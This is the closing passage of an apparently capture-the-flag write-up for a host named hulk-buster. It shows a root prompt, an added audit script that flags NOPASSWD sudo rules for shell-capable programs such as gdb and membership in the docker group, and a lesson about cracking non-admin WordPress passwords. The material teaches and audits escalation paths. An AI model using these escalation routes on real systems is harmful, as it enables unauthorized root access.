 |_| |_|\___/ \__| |_| \_|\___/ \___/|_.__/   \__,_|_|  \__\___|_|    |___/\___/|_| \_/ |_|_| |_|\__, |  \__|_| |_|_|___/  \_____|  |_|  |_|   
root@d5bd00c86145:/mnt/root#  
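Both escalation steps in this section (a NOPASSWD sudo rule for gdb, then a primary group of docker) are conditions a host audit can flag before anyone abuses them. As an added example that is not part of the writeup, this script parses `sudo -l` output and /etc/group lines and reports both: sudo rules for programs that can spawn a subprocess, and membership in container groups that grant host-filesystem access. The sample inputs are constructed from the output shown above, and the list of shell-capable programs is an assumption to be tuned to local policy.

```python
import re

# Programs that can launch a subprocess from inside the program (gdb's shell
# command as used above, editors, pagers, interpreters), so a sudo rule for
# them is effectively a sudo rule for a shell as the target account.
SHELL_CAPABLE = {"gdb", "vim", "vi", "less", "more", "man", "find", "awk",
                 "python", "python3", "perl", "env", "bash", "sh"}

# Groups whose members can start containers with the host filesystem mounted.
ROOT_EQUIVALENT_GROUPS = {"docker", "lxd"}

# One `sudo -l` rule line: "(runas) TAG: TAG: /path/cmd args, /path/cmd2".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Yield (runas, tags, command) from `sudo -l` output; Defaults lines are skipped."""
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").strip()
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            yield runas, tags, cmd.strip()


def audit_sudo(text):
    """Flag rules that hand out a shell as another account."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(text):
        auth = "without a password" if "NOPASSWD" in tags else "with own password"
        if cmd == "ALL":
            findings.append(f"sudo: any command as {runas} {auth}")
            continue
        prog = cmd.split()[0].rsplit("/", 1)[-1]
        if prog in SHELL_CAPABLE:
            findings.append(f"sudo: {prog} as {runas} {auth}; {prog} can spawn "
                            f"a subprocess, so this equals a shell as {runas}")
    return findings


def audit_groups(group_text, user, primary_gid=None):
    """Flag root-equivalent group membership, by member list or by primary GID
    (offensivehack above is in docker only through its primary GID 119)."""
    findings = []
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) < 4:
            continue
        name, _, gid, members = fields[:4]
        if name not in ROOT_EQUIVALENT_GROUPS:
            continue
        if user in members.split(",") or (primary_gid is not None and gid == primary_gid):
            findings.append(f"group: {user} is in '{name}' (gid {gid}), which gives root "
                            f"via a container with the host filesystem mounted")
    return findings


# Constructed samples modelled on the output shown in the writeup.
SAMPLE_SUDO_L = r"""Matching Defaults entries for www-data on hulk-buster:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on hulk-buster:
    (offensivehack) NOPASSWD: /usr/bin/gdb
"""
SAMPLE_GROUP = """root:x:0:
sudo:x:27:
docker:x:119:
hacker:x:1000:
offensivehack:x:1001:
"""

if __name__ == "__main__":
    for f in audit_sudo(SAMPLE_SUDO_L) + audit_groups(SAMPLE_GROUP, "offensivehack", "119"):
        print("[!]", f)
```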

Lessons Learned

  1. Normally wpscan only needs to crack the administrator account's password, but on this machine cracking the admin password failed. In that case the other user should be considered as well, especially since the vulnerable plugin can be exploited by a user of any role.

From: https://www.cnblogs.com/jason-huawen/p/17226088.html